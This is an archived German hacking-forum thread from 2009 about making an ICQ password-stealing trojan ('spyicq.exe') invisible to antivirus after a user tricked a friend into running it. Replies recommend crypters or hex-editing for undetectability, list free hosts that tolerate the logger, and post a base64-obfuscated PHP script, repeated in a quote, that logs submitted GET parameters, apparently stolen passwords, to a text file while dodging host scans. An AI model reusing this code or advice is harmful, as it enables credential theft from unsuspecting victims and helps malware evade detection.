PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : spy icq unsichtbar



megahacker
08.03.2009, 13:52
wie kriegt man das hin, dass die spyicq.exe unsichtbar ist?
hab mal nen freund dazu überredet, dass er die datei annimmt und guckt, ob der antivirus was sagt, und der hat was gesagt(trojaner gefunden)
PS: ah noch was: warum komme ich nicht mehr auf funpic drauf? nachdem die php-datei auf mein server war kann ich nicht mehr drauf. der zeigt an: sry, ihr benutzerkono ist nicht aktiv oder irgendwie so was

garwga
08.03.2009, 14:07
Benutz nen Crypter oder hex die spyicq.exe UD.
Zu 2. : Such dir nen anderen hoster (z.B. extra.hu). Funpic löscht dein Benutzerkonto soblad du die phpfile da hochlädst. Alternativ könntest du die Datei mit Base64 verschlüsseln, das müsste auch gehen.
MfG

megahacker
10.03.2009, 19:34
danke für die coole antwort
welche server gehen eigetlich noch?
extra.hu ist irgendwie nicht deutsch deshalb

garwga
10.03.2009, 19:43
Hier ne Anleitung zum registrieren auf extra.hu. klick (http://www.k-cheat.de/-tut-registrieren-bei-extra-hu-t-2786.html)
Ansonsten kenn ich nur noch iespana.es, 1gb.in, pytal.de und kilu.de
MfG

simon1410
10.03.2009, 19:46
Benutz nen Crypter oder hex die spyicq.exe UD.
Zu 2. : Such dir nen anderen hoster (z.B. extra.hu). Funpic löscht dein Benutzerkonto soblad du die phpfile da hochlädst. Alternativ könntest du die Datei mit Base64 verschlüsseln, das müsste auch gehen.
MfG

könntest auch mal erklären was man mit Base64 verschlüsseln soll?

garwga
10.03.2009, 20:27
spy.php :


<?php
eval(base64_decode('ICAgICAkZGF0ZWkgPSAnYWZmZW5icm 90YmF1bS50eHQnOyANCiAgICAgJGhhbmRsZSA9IGZvcGVu
KCRkYXRlaSwgJ2ErJyk7ICAgICAgICAgDQogICAgICRjb3VudG VyID0gMDsgDQogICAgIGlmKGlz
X3dyaXRlYWJsZSgkZGF0ZWkpKXsgDQogICAgICAgICBmb3JlYW NoKCRfR0VUIEFTICRrZXkgPT4g
JHZhbHVlKXsgDQogICAgICAgICAgICAgJGFjdGlvbiA9IGZ3cm l0ZSgkaGFuZGxlLCAieyRrZXl9
IDogeyR2YWx1ZX1cclxuIik7IA0KICAgICAgICAgICAgICRjb3 VudGVyKys7IA0KICAgICAgICAg
fSANCn0='));
?>

Allerdings sind die logs dann anstatt in "icqpws.txt" in "affenbrotbaum.txt". Könnte ja sein das funpic auch hiernach scannt.
MfG

tito.
20.03.2009, 11:04
spy.php :


<?php
eval(base64_decode('ICAgICAkZGF0ZWkgPSAnYWZmZW5icm 90YmF1bS50eHQnOyANCiAgICAgJGhhbmRsZSA9IGZvcGVu
KCRkYXRlaSwgJ2ErJyk7ICAgICAgICAgDQogICAgICRjb3VudG VyID0gMDsgDQogICAgIGlmKGlz
X3dyaXRlYWJsZSgkZGF0ZWkpKXsgDQogICAgICAgICBmb3JlYW NoKCRfR0VUIEFTICRrZXkgPT4g
JHZhbHVlKXsgDQogICAgICAgICAgICAgJGFjdGlvbiA9IGZ3cm l0ZSgkaGFuZGxlLCAieyRrZXl9
IDogeyR2YWx1ZX1cclxuIik7IA0KICAgICAgICAgICAgICRjb3 VudGVyKys7IA0KICAgICAgICAg
fSANCn0='));
?>

Allerdings sind die logs dann anstatt in "icqpws.txt" in "affenbrotbaum.txt". Könnte ja sein das funpic auch hiernach scannt.
MfG

kann man den code auch sonst so übernehmen und in eine php einfügen u. auf ein hostler hochladen?